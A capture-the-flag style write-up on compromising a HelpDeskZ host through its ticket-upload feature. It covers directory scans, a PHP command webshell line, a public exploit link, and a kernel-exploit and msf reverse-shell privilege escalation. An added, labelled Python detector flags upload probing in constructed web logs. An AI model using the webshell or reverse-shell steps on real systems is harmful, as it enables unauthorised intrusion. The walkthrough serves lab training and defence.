10.10.10.121
80
Visiting 10.10.10.121:80 shows Apache/2.4.18 (Ubuntu) serving the default configuration page.
Directory scan
- gobuster -u http://10.10.10.121:80/support/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
```
/uploads (Status: 301)
/css (Status: 301)
/includes (Status: 301)
```
An uploads directory exists; the 302 redirects land on the Apache default configuration page.
- gobuster -u http://10.10.10.121/support/uploads -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
```
/articles (Status: 301)
/tickets (Status: 301)
```
- gobuster -u http://10.10.10.121/support/uploads/tickets -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Exploit attempts
- searchsploit help deskZ
- Try the file upload
http://10.10.10.121/support/?v=submit_ticket&action=displayForm
- Try the exploit from GitHub
https://raw.githubusercontent.com/trevlee/helpdeskz_exploit/master/exploit
Looking at the exploit: it derives the name of the uploaded PHP script from the time, joins that name to the base URL, and checks whether the response status code is 200.
A 200 means the upload succeeded.
First upload a PHP script (the upload location is the one from the "Try the file upload" step above) with the content `<?php echo(system($_GET["cmd"])); ?>`
The webshell is uploaded successfully.
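The exploit behaviour described above (an automated client requesting guessed script names under the upload directory until one answers 200, then calling it with a `cmd` query) leaves a distinctive trace in the web server's access log. The following detector is an added example from the defender's side; it is not code from this writeup or from the linked exploit repository. The log lines are constructed, the `/support/uploads/` prefix is taken from the scan results above, and the threshold of five misses is an assumed tuning value.

```python
import re
from collections import defaultdict

# Constructed sample Apache combined-log lines (not taken from the writeup):
# one client misses repeatedly on script names under /support/uploads/tickets/,
# gets a 200 on the sixth guess, then calls that script with ?cmd=.
SAMPLE_LOG = """\
10.10.14.5 - - [08/Mar/2019:10:01:10 +0000] "POST /support/?v=submit_ticket&action=submit HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.10.14.5 - - [08/Mar/2019:10:01:11 +0000] "GET /support/uploads/tickets/1a2b3c4d5e6f708192a3b4c5d6e7f801.php HTTP/1.1" 404 275 "-" "python-requests/2.21.0"
10.10.14.5 - - [08/Mar/2019:10:01:11 +0000] "GET /support/uploads/tickets/2a2b3c4d5e6f708192a3b4c5d6e7f802.php HTTP/1.1" 404 275 "-" "python-requests/2.21.0"
10.10.14.5 - - [08/Mar/2019:10:01:11 +0000] "GET /support/uploads/tickets/3a2b3c4d5e6f708192a3b4c5d6e7f803.php HTTP/1.1" 404 275 "-" "python-requests/2.21.0"
10.10.14.5 - - [08/Mar/2019:10:01:12 +0000] "GET /support/uploads/tickets/4a2b3c4d5e6f708192a3b4c5d6e7f804.php HTTP/1.1" 404 275 "-" "python-requests/2.21.0"
10.10.14.5 - - [08/Mar/2019:10:01:12 +0000] "GET /support/uploads/tickets/5a2b3c4d5e6f708192a3b4c5d6e7f805.php HTTP/1.1" 404 275 "-" "python-requests/2.21.0"
10.10.14.5 - - [08/Mar/2019:10:01:12 +0000] "GET /support/uploads/tickets/6a2b3c4d5e6f708192a3b4c5d6e7f806.php HTTP/1.1" 200 18 "-" "python-requests/2.21.0"
10.10.14.5 - - [08/Mar/2019:10:01:15 +0000] "GET /support/uploads/tickets/6a2b3c4d5e6f708192a3b4c5d6e7f806.php?cmd=id HTTP/1.1" 200 54 "-" "Mozilla/5.0"
10.10.14.9 - - [08/Mar/2019:10:02:01 +0000] "GET /support/css/style.css HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Apache combined log format: client, identd, user, [timestamp], "request", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Upload tree observed in the directory scan above.
UPLOAD_DIR = "/support/uploads/"
SCRIPT_EXTS = (".php", ".phtml", ".php5")


def parse_line(line):
    """Return (ip, method, path, query, status) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    path, _, query = m.group("target").partition("?")
    return m.group("ip"), m.group("method"), path, query, int(m.group("status"))


def is_script_under_uploads(path):
    """True when a server-side script is being requested from the upload tree."""
    return path.startswith(UPLOAD_DIR) and path.lower().endswith(SCRIPT_EXTS)


def find_upload_probing(log_text, min_misses=5):
    """
    Flag clients that miss at least `min_misses` times on script paths under the
    upload directory. For each flagged client, report the first script path that
    answered 200 (the guess landed) and whether any successful request carried a
    query string (the script is being driven with parameters).
    """
    misses = defaultdict(int)
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, _method, path, query, status = rec
        if not is_script_under_uploads(path):
            continue
        if status == 404:
            misses[ip] += 1
        elif status == 200:
            hits[ip].append((path, query))

    findings = []
    for ip, n in misses.items():
        if n < min_misses:
            continue
        successes = hits.get(ip, [])
        findings.append({
            "ip": ip,
            "misses": n,
            "first_hit": successes[0][0] if successes else None,
            "executed_with_query": any(q for _path, q in successes),
        })
    return findings


if __name__ == "__main__":
    for finding in find_upload_probing(SAMPLE_LOG):
        print(finding)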
Port 3000
Privilege escalation
Information gathering
Obtain a webshell as the help user; if you do not know how to do this step, see https://whale3070.github.io/tag/#/command%20execution
After checking the kernel version, run `searchsploit linux 4.4.0`; judging from the results, the msf suggester is worth trying.
Generate a 64-bit msf reverse-connect payload and upload it
Attacking machine webshell:
Local listener:
Attacking machine webshell: ./payload.elf
Local listener, the msf payload connects back successfully: